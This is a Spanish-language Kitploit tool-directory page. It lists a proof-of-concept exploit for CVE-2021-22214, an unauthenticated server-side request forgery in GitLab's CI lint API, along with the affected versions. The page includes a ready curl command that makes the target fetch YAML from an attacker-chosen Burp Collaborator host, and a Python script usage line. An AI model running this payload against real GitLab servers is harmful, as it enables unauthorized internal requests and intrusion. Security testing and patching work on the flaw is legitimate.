Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
GitLab-SSRF-CVE-2021-22214 — Prueba de concepto del exploit para CVE-2021-22214, una falsificación de solicitud del lado del servidor en los webhooks de GitLab, que permite a atacantes no autenticados realizar solicitudes HTTP internas. | Kitploit
Herramientas/GitHubGitHub/kh4sh3i/gitlab-ssrf-cve-2021-22214
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad Web
GitHubkh4sh3i/gitlab-ssrf-cve-2021-22214

GitLab-SSRF-CVE-2021-22214

Prueba de concepto del exploit para CVE-2021-22214, una falsificación de solicitud del lado del servidor en los webhooks de GitLab, que permite a atacantes no autenticados realizar solicitudes HTTP internas.

Ver RepositorioSitio web
31hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-22214

POC para CVE-2021-22214: SSRF en Gitlab

Descripción

La instalación remota de GitLab contiene una vulnerabilidad de falsificación de solicitudes del lado del servidor (SSRF) como resultado de que la red interna para webhooks está habilitada. Un atacante remoto no autenticado puede explotar una instancia de GitLab con registro limitado, lo que provoca que realice solicitudes HTTP a un dominio arbitrario elegido por el atacante.

Uso

  • Código Python

    root@kitploit:~
    usage:   python3 GitLab_SSRF.py <target> <burp_collaborator_url>
    
  • Comando Curl

root@kitploit:~
curl -s –show-error -H 'Content-Type: application/json' https://TargetIP/api/v4/ci/lint –data '{ "include_merged_yaml": true, "content": "include:\n remote: http://Burp-Collaborator/test.yml"}' 

Afecta

  • Gitlab >=10.5, <13.10.5
  • Gitlab >=13.11, <13.11.5
  • Gitlab >=13.12, <13.12.2

Referencia

  • SSRF en GitLab (CVE-2021-22214)
  • tenable.com
Descargar herramienta